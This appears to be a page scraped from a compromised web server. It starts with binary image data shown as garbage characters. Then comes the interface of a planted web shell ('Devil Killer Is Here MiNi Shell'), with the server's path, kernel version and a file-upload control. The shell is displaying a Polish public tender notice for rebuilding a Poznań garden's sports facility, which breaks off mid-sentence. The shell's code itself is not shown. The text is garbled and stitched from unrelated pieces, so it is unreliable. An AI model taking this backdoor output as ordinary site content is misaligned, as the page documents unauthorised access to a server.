JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20210827/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20210827/0016253201-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Modernizacja Ogrodu Jordanowskiego nr 1 w Poznaniu przy ul. Solna 2”- III przetarg </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Poznańskie Inwestycje Miejskie Sp. z o.o.</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 302689539</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">pl. Wiosny Ludów 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Poznań</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">61-831</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL415 - Miasto Poznań</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne@pim.poznan.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.pim.poznan.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Budownictwo i obiekty komunalne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Modernizacja Ogrodu Jordanowskiego nr 1 w Poznaniu przy ul. Solna 2”- III przetarg </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0b8cb355-0724-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00162532</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-08-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00007473/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.20 "Modernizacja Ogrodu Jordanowskiego nr 1 przy ul. Solnej 2”</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.pim.poznan.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W<br/>postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami, odbywa<br/>się przy użyciu poczty elektronicznej - email Zamawiającego: zamowienia.publiczne@pim.poznan.pl, a<br/>także miniPortalu https://miniportal.uzp.gov.pl/ oraz platformy ePUAP<br/>https://epuap.gov.pl/wps/portal/strefa-klienta/katalog-spraw/profil-urzedu/PIMSPZOO.2. Wykonawca<br/>zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać<br/>dostęp do konta na ePUAP. Wykonawca posiadający dostęp do konta na ePUAP ma możliwość<br/>skorzystania z następujących formularzy: „Złożenia, zmiany, wycofania oferty lub wniosku” oraz do<br/>„Formularza do komunikacji”. 3. Wymagania techniczne i organizacyjne wysyłania i odbierania<br/>dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji<br/>przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz<br/>Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP). 4.<br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia,<br/>zmiany, wycofania oferty lub wniosku oraz do komunikacji wynosi 150 MB. 5. Za datę przekazania<br/>oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii<br/>dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP lub<br/>na adres email: : zamowienia.publiczne@pim.poznan.pl.6. Sposób komunikowania się Zamawiającego<br/>z Wykonawcami (nie dotyczy składania ofert).6.1. W postępowaniu o udzielenie zamówienia<br/>komunikacja pomiędzy Zamawiającym a Wykonawcami,w szczególności składanie oświadczeń,<br/>wniosków, zawiadomień oraz przekazywanie informacji odbywa się elektronicznie za pośrednictwem<br/>dedykowanego formularza: „Formularz do komunikacji” dostępnego na ePUAP oraz udostępnionego<br/>przez miniPortal. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i<br/>Wykonawcy posługują się numerem ogłoszenia (BZP, TED lub numerem postępowania).6.2.<br/>Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej, email:<br/>zamowienia.publiczne@pim.poznan.pl (preferowany sposób komunikacji).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje o zasadach przetwarzania Panią/Pana w<br/>związku z ogłoszeniem zamówienia publicznego.Administratorem danych osobowych przetwarzanych<br/>na potrzeby ogłoszonego postępowania w zakresie inwestycji Miasta Poznania jest Prezydent Miasta<br/>Poznań z siedzibą przy Placu Kolegiackim 17, 61-841 Poznań. Administrator powołał Inspektora<br/>Ochrony Danych, z którym można się kontaktować elektronicznie pod adresem iod@um.poznan.pl lub<br/>pisemnie na adres plac Kolegiacki 17, 61-841 Poznań.Pani/Pana dane osobowe będą przetwarzane w<br/>celu przeprowadzenia postępowania o udzielenie zamówienia publicznego, na podstawie prawnej<br/>wynikającej z art. 6 ust. 1 lit. c Rozporządzenia, jako że jest to niezbędne do realizacji obowiązku<br/>prawnego ciążącego na Administratorze w zakresie w jakim przebieg procesu wyboru wykonawcy musi<br/>spełniać wymagania wynikające z ustawy Prawo zamówień publicznych.Pani/Pana dane osobowe<br/>będą wykorzystywane przez okres do zakończenia postępowania w przedmiocie udzielenia<br/>zamówienia publicznego.Następnie Pani/Pana dane osobowe będą przechowywane jako element<br/>protokołu o udzielenie zamówienia, przez okres 4 lat od dnia zakończenia postępowania, a jeżeli czas<br/>trwania umowy przekracza 4 lata, okres przechowywania protokołu obejmuje cały czas trwania<br/>umowy.Pani/Pana zostaną przekazane Miastu Poznań jako podmiotowi zawierającemu umowę z<br/>Wykonawcą wybranym w postępowaniu oraz Zarządowi Dróg Miejskich w Poznaniu jako podmiotowi,<br/>na którego rzecz inwestycja będzie realizowana.Odbiorcami Pani/Pana danych osobowych będą<br/>również osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o<br/>przepisy ustawy Prawo zamówień publicznych.W zakresie wynikającym z Rozporządzenia,<br/>przysługuje Pani/Panu prawo:• dostępu do treści danych osobowych, w tym uzyskania kopii danych, •<br/>do żądania sprostowania lub uzupełnienia danych osobowych,• do żądania ograniczenia przetwarzania<br/>danych,W przypadku uznania, iż przetwarzanie Pani/Pana danych osobowych przez Spółkę narusza<br/>przepisy o ochronie danych osobowych, przysługuje Pani/Panu prawo do wniesienia skargi do Prezesa<br/>Urzędu Ochrony Danych Osobowych.Ograniczenia praw - zakresie wynikającym z Rozporządzenia,<br/>nie przysługuje Pani/Panu prawo:• w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia<br/>danych osobowych; • prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO; • na<br/>podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą<br/>prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.Obowiązek podania<br/>przez Panią/Pana danych osobowych jest wymogiem ustawowym określonym w przepisach ustawy<br/>PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PIM/08/21/ZP 48/2019-230</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 1268378,49 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem inwestycji jest Modernizacja Ogrodu Jordanowskiego nr 1 w Poznaniu przy ul.<br/>Solna 2. Głównym punktem zadania jest budowa nowego budynku zaplecza sportowego. W tym<br/>celu należy wykonać budynek, fragmenty dojść z kostki brukowej łączące się z istniejącymi<br/>ciągami pieszymi oraz dokonać rozbiórki starego budynku. Etap ten obejmuje również wycinkę,<br/>nasadzenia rekompensacyjne oraz zasadzenie pamiątkowego dębu. Dojścia należy wykonać z<br/>kostki brukowej betonowej, w tym z kostki odzyskanej z rozebrania istniejącej ścieżki. Zakres<br/>realizacji zagospodarowania terenu, wycinek i rozbiórek jest ujęty na rysunku załączonym do<br/>tego opisu.<br/>Dodatkowe informacje dotyczące szczegółowego zakresu zamówienia zawarte zos </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45212140-9 - Obiekty rekreacyjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45112710-5 - Roboty w zakresie kształtowania terenów zielonych</p> <p class="mb-0">45262500-6 - Roboty murarskie i murowe</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">270 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje udzielenie zamówień o których mowa w art. 214 ust. 1 pkt. 7<br/>Ustawy<br/>w przypadku wystąpienia okoliczności, o których mowa w art. 214 ust. 1 pkt. 7 Ustawy (do 50%<br/>wartości zamówienia podstawowego).<br/>Przedmiot wspomnianych zamówień stanowić będą podobne roboty budowlane lub usługi, zgodne<br/>z przedmiotem zamówienia podstawowego. Zamawiający przewiduje udzielenie tego rodzaju<br/>zamówień<br/>w szczególności, gdy zajdzie konieczność i/lub potrzeba wykonania zakresów prac nieuwzględnionych<br/>w ramach zakresu zamówienia podstawowego, a których wykonanie będzie możliwe poprzez<br/>powtórzenie podobnych robót budowlanych lub usług co przewidziane w ramach zakresu zamówienia<br/>podstawowego<br/>– w szczególności w zakresie:<br/>• organizacji placu budowy i prac przygotowawczych;<br/>• robót rozbiórkowych / demontażowych;<br/>• robót ziemnych;<br/>• wyposażenie pomieszczeń;<br/>• zagospodarowanie zieleni;<br/>tablice informacyjne i oznakowanie;<br/>• budowy budynku oraz przyłączy wody i prądu oraz zbiornika retencyjnego, a także wykonanie pompy<br/>ciepła;<br/>• prace związane z budową ciągów pieszych.<br/>Przedmiot wspomnianych zamówień mogą stanowić także dodatkowe dostawy, których celem będzie<br/>częściowa wymiana dostarczonych produktów lub instalacji albo zwiększenie bieżących dostaw lub<br/>rozbudowa istniejących instalacji, jeżeli zmiana wykonawcy zobowiązywałaby zamawiającego do<br/>nabywania materiałów o innych właściwościach technicznych, co powodowałoby niekompatybilność<br/>techniczną lub nieproporcjonalnie duże trudności techniczne w użytkowaniu i utrzymaniu tych<br/>produktów lub instalacji.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zgodnie z SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji / rękojmi (OGR)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">płatności dla Podwykonawców (PP)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie Kierownika budowy (DKB)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 20.1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają następujące<br/>warunki udziału dotyczące:<br/>20.1.1. zdolności do występowania w obrocie gospodarczym oraz uprawnień do prowadzenia<br/>określonej działalności gospodarczej lub zawodowej:<br/>Zamawiający nie stawia warunku w ww. zakresach.<br/>20.1.2. sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunku w ww. zakresach.<br/>20.1.3. zdolności technicznej lub zawodowej.<br/>Zamawiający uzna ww. warunek za spełniony jeżeli Wykonawca wykaże, że w okresie ostatnich<br/>5 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy<br/>– w tym okresie), wykonał należycie co najmniej:<br/>• dwie roboty budowlane, polegające na budowie obiektu kubaturowego o powierzchni<br/>zabudowy nie mniejszej niż 150 m2 i wartości nie mniejszej niż 1 000 000,00 zł netto (każda z<br/>wykazanych),<br/>• dwie roboty polegające na budowie ciągu pieszego lub innego miejsca zagospodarowania<br/>terenu tj.np. chodnik, plac, parking z kostki betonowej/brukowej,<br/>20.1.3.1. Zamawiający uzna ww. warunek za spełniony, jeżeli Wykonawca wykaże, że<br/>dysponuje lub będzie dysponował:<br/>• Kierownikiem budowy/ Kierownik robót konstrukcyjno-budowalnych:<br/>- osoba posiadająca uprawnienia budowlane w specjalności konstrukcyjno-budowlanej bez<br/>ograniczeń zgodne z ustawą Prawo budowlane;<br/>– posiadane doświadczenie w kierowaniu i nadzorowaniu w charakterze Kierownika budowy<br/>i/lub kierownika robót branży konstrukcyjno-budowlanej – co najmniej 60-miesięcy (licząc od<br/>uzyskania uprawnień, o których mowa powyżej);<br/>- doświadczenie zawodowe szczegółowe: na stanowisku Kierownika budowy i/lub Kierownika<br/>robót podczas realizacji co najmniej 2 robót budowlanych polegających na budowie obiektu<br/>kubaturowego o powierzchni zabudowy nie mniejszej niż 150 m2 i wartości nie mniejszej niż 1<br/>000 000,00 zł netto (każda z wykazanych);<br/>- doświadczenie zawodowe szczegółowe: na stanowisku Kierownika budowy i/lub Kierownika<br/>robót podczas realizacji jednej roboty budowlanej realizowanej na obszarze zespołów<br/>urbanistyczno-architektonicznych wpisanych do rejestru zabytków.<br/>• Kierownik robót sanitarnych/instalacyjnych:<br/>- osoba posiadająca uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci,<br/>instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodnych i kanalizacyjnych bez<br/>ograniczeń zgodne z ustawą Prawo budowlane;<br/>- posiadane doświadczenie w kierowaniu i nadzorowaniu w charakterze Kierownika budowy i/lub<br/>kierownika robót branży sanitarnej – co najmniej 36-miesięcy (licząc od uzyskania uprawnień, o<br/>których mowa powyżej)<br/>• Kierownik robót elektrycznych i elektroenergetycznych:<br/>- osoba posiadająca uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci,<br/>instalacji i urządzeń elektrycznych bez ograniczeń zgodne z ustawą Prawo budowlane;<br/>– posiadane doświadczenie w kierowaniu i nadzorowaniu w charakterze Kierownika budowy<br/>i/lub kierownika robót branży elektrycznej – co najmniej 36-miesięcy (licząc od uzyskania<br/>uprawnień, o których mowa powyżej).<br/>• Osobą odpowiedzialną za wykonanie prac związanych z usunięciem, zabezpieczeniem i<br/>założeniem zieleni:<br/>– wykształcenie wyższe ogrodnicze,<br/>– min. 36-miesięczne doświadczenie w zakładaniu terenów zielonych.<br/>UWAGA:<br/>• Zamawiający dopuszcza możliwość łączenia funkcji kierowników robót w przypadku, gdy ta<br/>sama osoba posiada wymagane uprawnienia w więcej niż jednej specjalności.<br/>• za uprawnienia budowlane odpowiadające wyżej określonym uznane zostaną uprawnienia,<br/>które wydane zostały na podstawie wcześniej obowiązujących przepisów oraz odpowiadające im<br/>uprawnienia wydane obywatelom państw członkowskich Unii Europejskiej, Konfederacji<br/>Szwajcarskiej lub państw członkowskich Europejskiego Porozumienia o Wolnym Handlu – EFTA<br/>(strony umowy o Europejskim Obszarze Gospodarczym), z zastrzeżeniem art. 12 a oraz innych<br/>przepisów ustawy Prawo Budowlane oraz ustawy z dnia 18 marca 2008 r. o zasadach<br/>uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.<br/>U. z 2008 r. nr 63, poz. 394).<br/>• Wskazane powyżej doświadczenie w miesiącach (dot. Kierownika budowy / kierowników robót)<br/>należy liczyć od uzyskania uprawnień budowlanych.<br/>• zwrot „bez ograniczeń” należy rozumieć zgodnie z przepisami Rozdziału 2. ustawy z dnia 7<br/>lipca 1994 r. Prawo budowlane (tekst jednolity Dz.U. z 2020 r., poz. 1333 ze zm.). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">• wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i<br/>miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem<br/>dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o<br/>których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego<br/>roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w<br/>stanie uzyskać tych dokumentów – inne odpowiednie dokumenty – według wzoru stanowiącego<br/>Załącznik nr 8 do 